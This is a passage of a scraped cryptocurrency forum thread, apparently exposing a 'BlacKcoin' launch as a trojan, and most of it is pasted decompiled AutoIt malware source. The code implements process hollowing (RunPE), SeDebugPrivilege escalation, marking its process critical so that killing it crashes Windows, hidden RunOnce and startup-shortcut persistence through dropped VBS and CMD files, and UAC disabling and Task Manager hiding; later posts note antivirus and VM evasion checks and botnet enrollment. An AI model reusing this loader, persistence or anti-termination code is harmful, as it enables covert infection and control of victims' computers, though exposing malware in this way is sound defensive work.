0) Return SetError(4, 0, 0) EndIf Local $timage_nt_signature = DllStructCreate("DWORD SIGNATURE", $ppointer) $ppointer += 4 If DllStructGetData($timage_nt_signature, "SIGNATURE") <> 17744 Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0) Return SetError(5, 0, 0) EndIf Local $inumberofsections = DllStructGetData($timage_file_header, "NUMBEROFSECTIONS") $ppointer += 20 Local $imagic = DllStructGetData($tmagic, 1) Local $timage_optional_header If $imagic = 267 Then If $fautoitx64 Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0) Return SetError(6, 0, 0) EndIf $ppointer += 96 ElseIf $imagic = 523 Then If NOT $fautoitx64 Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0) Return SetError(6, 0, 0) EndIf $ppointer += 112 Else DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0) Return SetError(6, 0, 0) EndIf Local $ientrypointnew = DllStructGetData($timage_optional_header, "ADDRESSOFENTRYPOINT") Local $ioptionalheadersizeofheadersnew = DllStructGetData($timage_optional_header, "SIZEOFHEADERS") Local $poptionalheaderimagebasenew = DllStructGetData($timage_optional_header, "IMAGEBASE") Local $ioptionalheadersizeofimagenew = DllStructGetData($timage_optional_header, "SIZEOFIMAGE") $ppointer += 8 $ppointer += 8 $ppointer += 24 Local $paddressnewbasereloc = DllStructGetData($timage_directory_entry_basereloc, "VIRTUALADDRESS") Local $isizebasereloc = DllStructGetData($timage_directory_entry_basereloc, "SIZE") Local $frelocatable If $paddressnewbasereloc AND $isizebasereloc Then $frelocatable = True If NOT $frelocatable Then ConsoleWrite("!!!NOT RELOCATABLE MODULE. I WILL TRY BUT THIS MAY NOT WORK!!!" & @CRLF) $ppointer += 88 #Region 6. ALLOCATE 'NEW' MEMORY SPACE Local $frelocate Local $pzeropoint If $frelocatable Then $pzeropoint = __runpe_allocateexespace($hprocess, $ioptionalheadersizeofimagenew) If @error Then $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew) If @error Then __runpe_unmapviewofsection($hprocess, $poptionalheaderimagebasenew) $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew) If @error Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0) Return SetError(101, 1, 0) EndIf EndIf EndIf $frelocate = True Else $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew) If @error Then __runpe_unmapviewofsection($hprocess, $poptionalheaderimagebasenew) $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew) If @error Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0) Return SetError(101, 0, 0) EndIf EndIf EndIf DllStructSetData($timage_optional_header, "IMAGEBASE", $pzeropoint) #Region 7. CONSTRUCT THE NEW MODULE Local $tmodule = DllStructCreate("BYTE[" & $ioptionalheadersizeofimagenew & "]") Local $pmodule = DllStructGetPtr($tmodule) Local $theaders = DllStructCreate("BYTE[" & $ioptionalheadersizeofheadersnew & "]", $pheaders_new) DllStructSetData($tmodule, 1, DllStructGetData($theaders, 1)) Local $timage_section_header Local $isizeofrawdata, $ppointertorawdata Local $ivirtualaddress, $ivirtualsize Local $trelocraw For $i = 1 To $inumberofsections $isizeofrawdata = DllStructGetData($timage_section_header, "SIZEOFRAWDATA") $ppointertorawdata = $pheaders_new + DllStructGetData($timage_section_header, "POINTERTORAWDATA") $ivirtualaddress = DllStructGetData($timage_section_header, "VIRTUALADDRESS") $ivirtualsize = DllStructGetData($timage_section_header, "UNIONOFVIRTUALSIZEANDPHYSICALADDRESS") If $ivirtualsize AND $ivirtualsize < $isizeofrawdata Then $isizeofrawdata = $ivirtualsize If $isizeofrawdata Then DllStructSetData(DllStructCreate("BYTE[" & $isizeofrawdata & "]", $pmodule + $ivirtualaddress), 1, DllStructGetData(DllStructCreate("BYTE[" & $isizeofrawdata & "]", $ppointertorawdata), 1)) EndIf If $frelocate Then If $ivirtualaddress <= $paddressnewbasereloc AND $ivirtualaddress + $isizeofrawdata > $paddressnewbasereloc Then $trelocraw = DllStructCreate("BYTE[" & $isizebasereloc & "]", $ppointertorawdata + ($paddressnewbasereloc - $ivirtualaddress)) EndIf EndIf $ppointer += 40 Next If $frelocate Then __runpe_fixreloc($pmodule, $trelocraw, $pzeropoint, $poptionalheaderimagebasenew, $imagic = 523) $acall = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hprocess, "PTR", $pzeropoint, "PTR", $pmodule, "DWORD_PTR", $ioptionalheadersizeofimagenew, "DWORD_PTR*", 0) If @error OR NOT $acall[0] Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0) Return SetError(7, 0, 0) EndIf #Region 8. PEB IMAGEBASEADDRESS MANIPULATION $acall = DllCall("KERNEL32.DLL", "BOOL", "ReadProcessMemory", "PTR", $hprocess, "PTR", $ppeb, "PTR", DllStructGetPtr($tpeb), "DWORD_PTR", DllStructGetSize($tpeb), "DWORD_PTR*", 0) If @error OR NOT $acall[0] Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0) Return SetError(8, 0, 0) EndIf DllStructSetData($tpeb, "IMAGEBASEADDRESS", $pzeropoint) $acall = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hprocess, "PTR", $ppeb, "PTR", DllStructGetPtr($tpeb), "DWORD_PTR", DllStructGetSize($tpeb), "DWORD_PTR*", 0) If @error OR NOT $acall[0] Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0) Return SetError(9, 0, 0) EndIf #Region 9. NEW ENTRY POINT Switch $irunflag Case 1 DllStructSetData($tcontext, "EAX", $pzeropoint + $ientrypointnew) Case 2 DllStructSetData($tcontext, "RCX", $pzeropoint + $ientrypointnew) Case 3 EndSwitch #Region 10. SET NEW CONTEXT $acall = DllCall("KERNEL32.DLL", "BOOL", "SetThreadContext", "HANDLE", $hthread, "PTR", DllStructGetPtr($tcontext)) If @error OR NOT $acall[0] Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0) Return SetError(10, 0, 0) EndIf #Region 11. RESUME THREAD $acall = DllCall("KERNEL32.DLL", "DWORD", "ResumeThread", "HANDLE", $hthread) If @error OR $acall[0] = -1 Then DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0) Return SetError(11, 0, 0) EndIf #Region 12. CLOSE OPEN HANDLES AND RETURN PID DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hprocess) DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hthread) Return DllStructGetData($tprocess_information, "PROCESSID") EndFunc Func __runpe_fixreloc($pmodule, $tdata, $paddressnew, $paddressold, $fimagex64) Local $idelta = $paddressnew - $paddressold Local $isize = DllStructGetSize($tdata) Local $pdata = DllStructGetPtr($tdata) Local $timage_base_relocation, $irelativemove Local $ivirtualaddress, $isizeofblock, $inumberofentries Local $tenries, $idata, $taddress Local $iflag = 3 + 7 * $fimagex64 While $irelativemove < $isize $ivirtualaddress = DllStructGetData($timage_base_relocation, "VIRTUALADDRESS") $isizeofblock = DllStructGetData($timage_base_relocation, "SIZEOFBLOCK") $inumberofentries = ($isizeofblock - 8) / 2 $tenries = DllStructCreate("WORD[" & $inumberofentries & "]", DllStructGetPtr($timage_base_relocation) + 8) For $i = 1 To $inumberofentries $idata = DllStructGetData($tenries, 1, $i) If BitShift($idata, 12) = $iflag Then $taddress = DllStructCreate("PTR", $pmodule + $ivirtualaddress + BitAND($idata, 4095)) DllStructSetData($taddress, 1, DllStructGetData($taddress, 1) + $idelta) EndIf Next $irelativemove += $isizeofblock WEnd Return 1 EndFunc Func __runpe_allocateexespaceataddress($hprocess, $paddress, $isize) Local $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", $paddress, "DWORD_PTR", $isize, "DWORD", 4096, "DWORD", 64) If @error OR NOT $acall[0] Then $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", $paddress, "DWORD_PTR", $isize, "DWORD", 12288, "DWORD", 64) If @error OR NOT $acall[0] Then Return SetError(1, 0, 0) EndIf Return $acall[0] EndFunc Func __runpe_allocateexespace($hprocess, $isize) Local $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", 0, "DWORD_PTR", $isize, "DWORD", 12288, "DWORD", 64) If @error OR NOT $acall[0] Then Return SetError(1, 0, 0) Return $acall[0] EndFunc Func __runpe_unmapviewofsection($hprocess, $paddress) DllCall("NTDLL.DLL", "INT", "NtUnmapViewOfSection", "PTR", $hprocess, "PTR", $paddress) If @error Then Return SetError(1, 0, 0) Return 1 EndFunc Func __runpe_iswow64process($hprocess) Local $acall = DllCall("KERNEL32.DLL", "BOOL", "IsWow64Process", "HANDLE", $hprocess, "BOOL*", 0) If @error OR NOT $acall[0] Then Return SetError(1, 0, 0) Return $acall[2] EndFunc Global Const $error_no_token = 1008 Global Const $se_privilege_enabled_by_default = 1 Global Const $se_privilege_enabled = 2 Global Const $se_privilege_removed = 4 Global Enum $tokenprimary = 1, $tokenimpersonation Global Enum $securityanonymous = 0, $securityidentification, $securityimpersonation, $securitydelegation Global Const $token_assign_primary = 1 Global Const $token_duplicate = 2 Global Const $token_impersonate = 4 Global Const $token_query = 8 Global Const $token_query_source = 16 Global Const $token_adjust_privileges = 32 Func _winapi_getlasterror($curerr = @error, $curext = @extended) Local $aresult = DllCall("kernel32.dll", "dword", "GetLastError") Return SetError($curerr, $curext, $aresult[0]) EndFunc Func _security__adjusttokenprivileges($htoken, $fdisableall, $pnewstate, $ibufferlen, $pprevstate = 0, $prequired = 0) Local $acall = DllCall("advapi32.dll", "bool", "AdjustTokenPrivileges", "handle", $htoken, "bool", $fdisableall, "struct*", $pnewstate, "dword", $ibufferlen, "struct*", $pprevstate, "struct*", $prequired) If @error Then Return SetError(1, @extended, False) Return NOT ($acall[0] = 0) EndFunc Func _security__getlengthsid($psid) If NOT _security__isvalidsid($psid) Then Return SetError(1, @extended, 0) Local $acall = DllCall("advapi32.dll", "dword", "GetLengthSid", "struct*", $psid) If @error Then Return SetError(2, @extended, 0) Return $acall[0] EndFunc Func _security__impersonateself($ilevel = $securityimpersonation) Local $acall = DllCall("advapi32.dll", "bool", "ImpersonateSelf", "int", $ilevel) If @error Then Return SetError(1, @extended, False) Return NOT ($acall[0] = 0) EndFunc Func _security__isvalidsid($psid) Local $acall = DllCall("advapi32.dll", "bool", "IsValidSid", "struct*", $psid) If @error Then Return SetError(1, @extended, False) Return NOT ($acall[0] = 0) EndFunc Func _security__lookupaccountname($saccount, $ssystem = "") Local $tdata = DllStructCreate("byte SID[256]") Local $acall = DllCall("advapi32.dll", "bool", "LookupAccountNameW", "wstr", $ssystem, "wstr", $saccount, "struct*", $tdata, "dword*", DllStructGetSize($tdata), "wstr", "", "dword*", DllStructGetSize($tdata), "int*", 0) If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0) Local $aacct[3] $aacct[0] = _security__sidtostringsid(DllStructGetPtr($tdata, "SID")) $aacct[1] = $acall[5] $aacct[2] = $acall[7] Return $aacct EndFunc Func _security__lookupprivilegevalue($ssystem, $sname) Local $acall = DllCall("advapi32.dll", "bool", "LookupPrivilegeValueW", "wstr", $ssystem, "wstr", $sname, "int64*", 0) If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0) Return $acall[3] EndFunc Func _security__openthreadtoken($iaccess, $hthread = 0, $fopenasself = False) If $hthread = 0 Then $hthread = _winapi_getcurrentthread() If @error Then Return SetError(1, @extended, 0) Local $acall = DllCall("advapi32.dll", "bool", "OpenThreadToken", "handle", $hthread, "dword", $iaccess, "bool", $fopenasself, "handle*", 0) If @error OR NOT $acall[0] Then Return SetError(2, @extended, 0) Return $acall[4] EndFunc Func _security__openthreadtokenex($iaccess, $hthread = 0, $fopenasself = False) Local $htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself) If $htoken = 0 Then If _winapi_getlasterror() <> $error_no_token Then Return SetError(3, _winapi_getlasterror(), 0) If NOT _security__impersonateself() Then Return SetError(1, _winapi_getlasterror(), 0) $htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself) If $htoken = 0 Then Return SetError(2, _winapi_getlasterror(), 0) EndIf Return $htoken EndFunc Func _security__setprivilege($htoken, $sprivilege, $fenable) Local $iluid = _security__lookupprivilegevalue("", $sprivilege) If $iluid = 0 Then Return SetError(1, @extended, False) Local $tcurrstate = DllStructCreate($tagtoken_privileges) Local $icurrstate = DllStructGetSize($tcurrstate) Local $tprevstate = DllStructCreate($tagtoken_privileges) Local $iprevstate = DllStructGetSize($tprevstate) Local $trequired = DllStructCreate("int Data") DllStructSetData($tcurrstate, "Count", 1) DllStructSetData($tcurrstate, "LUID", $iluid) If NOT _security__adjusttokenprivileges($htoken, False, $tcurrstate, $icurrstate, $tprevstate, $trequired) Then Return SetError(2, @error, False) DllStructSetData($tprevstate, "Count", 1) DllStructSetData($tprevstate, "LUID", $iluid) Local $iattributes = DllStructGetData($tprevstate, "Attributes") If $fenable Then $iattributes = BitOR($iattributes, $se_privilege_enabled) Else $iattributes = BitAND($iattributes, BitNOT($se_privilege_enabled)) EndIf DllStructSetData($tprevstate, "Attributes", $iattributes) If NOT _security__adjusttokenprivileges($htoken, False, $tprevstate, $iprevstate, $tcurrstate, $trequired) Then Return SetError(3, @error, False) Return True EndFunc Func _security__sidtostringsid($psid) If NOT _security__isvalidsid($psid) Then Return SetError(1, 0, "") Local $acall = DllCall("advapi32.dll", "bool", "ConvertSidToStringSidW", "struct*", $psid, "ptr*", 0) If @error OR NOT $acall[0] Then Return SetError(2, @extended, "") Local $pstringsid = $acall[2] Local $ssid = DllStructGetData(DllStructCreate("wchar Text[" & _winapi_stringlenw($pstringsid) + 1 & "]", $pstringsid), "Text") _winapi_localfree($pstringsid) Return $ssid EndFunc Func _security__stringsidtosid($ssid) Local $acall = DllCall("advapi32.dll", "bool", "ConvertStringSidToSidW", "wstr", $ssid, "ptr*", 0) If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0) Local $psid = $acall[2] Local $tbuffer = DllStructCreate("byte Data[" & _security__getlengthsid($psid) & "]", $psid) Local $tsid = DllStructCreate("byte Data[" & DllStructGetSize($tbuffer) & "]") DllStructSetData($tsid, "Data", DllStructGetData($tbuffer, "Data")) _winapi_localfree($psid) Return $tsid EndFunc Func _winapi_closehandle($hobject) Local $aresult = DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hobject) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_createsolidbrush($ncolor) Local $aresult = DllCall("gdi32.dll", "handle", "CreateSolidBrush", "dword", $ncolor) If @error Then Return SetError(@error, @extended, 0) Return $aresult[0] EndFunc Func _winapi_deletedc($hdc) Local $aresult = DllCall("gdi32.dll", "bool", "DeleteDC", "handle", $hdc) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_deleteobject($hobject) Local $aresult = DllCall("gdi32.dll", "bool", "DeleteObject", "handle", $hobject) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_fillrect($hdc, $ptrrect, $hbrush) Local $aresult If IsPtr($hbrush) Then $aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "handle", $hbrush) Else $aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "dword_ptr", $hbrush) EndIf If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_getclassname($hwnd) If NOT IsHWnd($hwnd) Then $hwnd = GUICtrlGetHandle($hwnd) Local $aresult = DllCall("user32.dll", "int", "GetClassNameW", "hwnd", $hwnd, "wstr", "", "int", 4096) If @error Then Return SetError(@error, @extended, False) Return SetExtended($aresult[0], $aresult[2]) EndFunc Func _winapi_getclientrect($hwnd) Local $trect = DllStructCreate($tagrect) DllCall("user32.dll", "bool", "GetClientRect", "hwnd", $hwnd, "struct*", $trect) If @error Then Return SetError(@error, @extended, 0) Return $trect EndFunc Func _winapi_getcurrentthread() Local $aresult = DllCall("kernel32.dll", "handle", "GetCurrentThread") If @error Then Return SetError(@error, @extended, 0) Return $aresult[0] EndFunc Func _winapi_getdc($hwnd) Local $aresult = DllCall("user32.dll", "handle", "GetDC", "hwnd", $hwnd) If @error Then Return SetError(@error, @extended, 0) Return $aresult[0] EndFunc Func _winapi_getdesktopwindow() Local $aresult = DllCall("user32.dll", "hwnd", "GetDesktopWindow") If @error Then Return SetError(@error, @extended, 0) Return $aresult[0] EndFunc Func _winapi_getmodulehandle($smodulename) Local $smodulenametype = "wstr" If $smodulename = "" Then $smodulename = 0 $smodulenametype = "ptr" EndIf Local $aresult = DllCall("kernel32.dll", "handle", "GetModuleHandleW", $smodulenametype, $smodulename) If @error Then Return SetError(@error, @extended, 0) Return $aresult[0] EndFunc Func _winapi_getwindow($hwnd, $icmd) Local $aresult = DllCall("user32.dll", "hwnd", "GetWindow", "hwnd", $hwnd, "uint", $icmd) If @error Then Return SetError(@error, @extended, 0) Return $aresult[0] EndFunc Func _winapi_iswindowvisible($hwnd) Local $aresult = DllCall("user32.dll", "bool", "IsWindowVisible", "hwnd", $hwnd) If @error Then Return SetError(@error, @extended, 0) Return $aresult[0] EndFunc Func _winapi_lineto($hdc, $ix, $iy) Local $aresult = DllCall("gdi32.dll", "bool", "LineTo", "handle", $hdc, "int", $ix, "int", $iy) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_localfree($hmem) Local $aresult = DllCall("kernel32.dll", "handle", "LocalFree", "handle", $hmem) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_moveto($hdc, $ix, $iy) Local $aresult = DllCall("gdi32.dll", "bool", "MoveToEx", "handle", $hdc, "int", $ix, "int", $iy, "ptr", 0) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_openprocess($iaccess, $finherit, $iprocessid, $fdebugpriv = False) Local $aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid) If @error Then Return SetError(@error, @extended, 0) If $aresult[0] Then Return $aresult[0] If NOT $fdebugpriv Then Return 0 Local $htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query)) If @error Then Return SetError(@error, @extended, 0) _security__setprivilege($htoken, "SeDebugPrivilege", True) Local $ierror = @error Local $ilasterror = @extended Local $iret = 0 If NOT @error Then $aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid) $ierror = @error $ilasterror = @extended If $aresult[0] Then $iret = $aresult[0] _security__setprivilege($htoken, "SeDebugPrivilege", False) If @error Then $ierror = @error $ilasterror = @extended EndIf EndIf _winapi_closehandle($htoken) Return SetError($ierror, $ilasterror, $iret) EndFunc Func __winapi_parsefiledialogpath($spath) Local $afiles[3] $afiles[0] = 2 Local $stemp = StringMid($spath, 1, StringInStr($spath, "\", 0, -1) - 1) $afiles[1] = $stemp $afiles[2] = StringMid($spath, StringInStr($spath, "\", 0, -1) + 1) Return $afiles EndFunc Func _winapi_releasedc($hwnd, $hdc) Local $aresult = DllCall("user32.dll", "int", "ReleaseDC", "hwnd", $hwnd, "handle", $hdc) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_screentoclient($hwnd, ByRef $tpoint) Local $aresult = DllCall("user32.dll", "bool", "ScreenToClient", "hwnd", $hwnd, "struct*", $tpoint) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_selectobject($hdc, $hgdiobj) Local $aresult = DllCall("gdi32.dll", "handle", "SelectObject", "handle", $hdc, "handle", $hgdiobj) If @error Then Return SetError(@error, @extended, False) Return $aresult[0] EndFunc Func _winapi_stringlenw($vstring) Local $acall = DllCall("kernel32.dll", "int", "lstrlenW", "struct*", $vstring) If @error Then Return SetError(1, @extended, 0) Return $acall[0] EndFunc $scriptname = "displaydrivers.exe" Func anti_hook() __bsod($scriptname, True) EndFunc $protectprocess = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "3551354", "2518129", "NotFound") If $protectprocess = "3450378" Then AdlibRegister("anti_hook", 500) Else EndIf Func __bsod($process_name, $bsod_status) Local Const $status_success = 0 Local Const $bsod_class = 29 Local Const $info_length = 4 Local Const $process_all_access = 2035711 Local $result, $process_handle, $process_id, $bsod_struct, $bsod_struct_ptr If NOT Call("__DEBUGE_PRIVILEGE", True) Then Return "![>] ERROR : DEBUGE PRIVILEGE OF PROCESS [ " & $process_name & " ] CAN NOT CHANGED" $process_id = ProcessExists($process_name) If $process_id = 0 Then Return "![>] ERROR : PROCESS [ " & $process_name & " ] NOT EXIST" $process_handle = _winapi_openprocess($process_all_access, True, $process_id) If @error Then Return "![>] ERROR : CAN NOT OPEN [ " & $process_name & " ] PROCESS" $bsod_struct = DllStructCreate("BOOL BSOD_STATUS") DllStructSetData($bsod_struct, "BSOD_STATUS", $bsod_status) $bsod_struct_ptr = DllStructGetPtr($bsod_struct) $result = DllCall("NTDLL.DLL", "DWORD", "NtSetInformationProcess", "HANDLE", $process_handle, "INT", $bsod_class, "PTR", $bsod_struct_ptr, "ULONG", $info_length) _winapi_closehandle($process_handle) $bsod_struct_ptr = 0 If $result[0] = $status_success Then Return "+[>] BSOD OF PROCESS [ " & $process_name & " ] CHANGED WITH NO ERROR" & @CRLF Else Return "![>] ERROR : BSOD OF PROCESS [ " & $process_name & " ] NOT CHANGED , ERROR CODE : " & Hex($result[0], 8) EndIf EndFunc Func __debuge_privilege($status) Local $htoken, $ilasterror $htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query)) If @error Then Return SetError(@error, @extended, 0) $ilasterror = _security__setprivilege($htoken, "SEDEBUGPRIVILEGE", $status) _winapi_closehandle($htoken) Return $ilasterror EndFunc OnAutoItExitRegister("exitme") Func exitme() __bsod($scriptname, False) EndFunc Local $antibotkill = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "antibotkill-1", "antibotkill-2", "NotFound") If $antibotkill = "antibotkill-3" Then AdlibRegister("antibotkill", 1000) Else EndIf Func antibotkill() $getstart = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path) If $getstart = $unicode_userprofile & "\" & $path & "\84922.vbs" Then Else RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\" & $path & "\84922.vbs") EndIf If NOT FileExists($unicode_userprofile & "\" & $path & "\84922.vbs") Then Local $vbs = FileOpen($unicode_userprofile & "\" & $path & "\84922.vbs", 1) FileWrite($vbs, "const Hidden = 0" & @CRLF & "const WaitOnReturn = true" & @CRLF & 'File ="""' & $unicode_userprofile & "\" & $path & "\" & '74851.cmd"""' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & "WshShell.Run file, Hidden, WaitOnReturn" & @CRLF & "wscript.quit") FileClose($vbs) EndIf If NOT FileExists($unicode_userprofile & "\" & $path & "\74851.cmd") Then $autoit3 = "displaydrivers.exe" Local $bat = FileOpen($unicode_userprofile & "\" & $path & "\74851.cmd", 1) FileWrite($bat, "@echo off" & @CRLF & "cd " & $win_userprofile & $path & "\" & @CRLF & "start " & $autoit3 & " " & '"' & @ScriptName & '"') FileClose($bat) EndIf If NOT FileExists($unicode_startup & "\start.lnk") Then FileCreateShortcut($unicode_userprofile & "\" & $path & "\84922.vbs", $unicode_startup & "\start.lnk") FileSetAttrib($unicode_startup & "\start.lnk", "+SH") EndIf EndFunc Local $persistence = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "9634675", "4800937", "NotFound") If $persistence = "8598688" Then checkvbs() AdlibRegister("persistence", 500) Else EndIf Func checkvbs() If NOT FileExists($uniscriptdir & "\run.vbs") Then FileWrite($uniscriptdir & "\run.vbs", "Set WshShell = WScript.CreateObject(" & '"' & "WScript.Shell" & '")' & @CRLF & "WshShell.Run" & '"' & "displaydrivers.exe " & @ScriptName & '"') EndIf EndFunc Local $systemhide = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "1166881", "3190765", "NotFound") If $systemhide = "2661758" Then AdlibRegister("systemhide", 500) Else EndIf Local $antitask = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "antitask1", "antitask2", "NotFound") If $antitask = "antitask3" Then AdlibRegister("antitask", 500) Else EndIf Local $uac = IniRead($uniscriptdir & "\lcOfvbDCSMZ.CCP", "uac1", "uac2", "NotFound") If $uac = "uac3" Then AdlibRegister("disable_uac", 500) Else EndIf If $uac = "uac3" Then loop() EndIf If $systemhide = "2661758" Then loop() EndIf If $antitask = "antitask" Then loop() EndIf If $antibotkill = "antibotkill-3" Then loop() EndIf If $mutex = "mutex3" Then loop() EndIf If $protectprocess = "3450378" Then loop() EndIf If $persistence = "8598688" Then loop() EndIf Func loop() While 1 If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then __bsod($scriptname, False) EndIf If WinExists($path) Then bsod() Else EndIf Sleep(100) WEnd EndFunc
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: sesko on January 22, 2014, 11:02:44 PM
If your having Avast, you'll be probably toasted: If ProcessExists("avastui.exe") Then Sleep(20000)
and hiding from: If ProcessExists("VMwaretray.exe") Then Exit
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Snard on January 22, 2014, 11:05:44 PM
Adds you to a botnet:
http://www.exposedbotnets.com/2013/12/bootsx-betabot-http-botnet-hosted-by.html
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: Snard on January 22, 2014, 11:06:35 PM
If your having Avast, you'll be probably toasted: If ProcessExists("avastui.exe") Then Sleep(20000)
No more than any other AV. All it does is pause for 20 seconds if avast is found.
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: SlidingHorn on January 22, 2014, 11:12:26 PM
How can you call it launched if you haven't even fully developed/compiled wallets?
Title: Re: [ANN][BlacK] BlacKcoin | no premine ✓ | launched NOW
Post by: SlidingHorn on January 22, 2014, 11:14:11 PM
Adds you to a botnet:
http://www.exposedbotnets.com/2013/12/bootsx-betabot-http-botnet-hosted-by.html
Oh...that's how, lmao I also love how the OP's entire posting history is begging for other alts... FAIL
Title: Re: [ANN][BlacK] My account was hacked. I did not crea | no premine ✓ | launched NOW
Post by: AMAZONBTC on January 23, 2014, 03:37:31 AM
My account was hacked. I did not create this topic.
BlacKcoin is SCAM
LMFAO! gtfo of this forum
|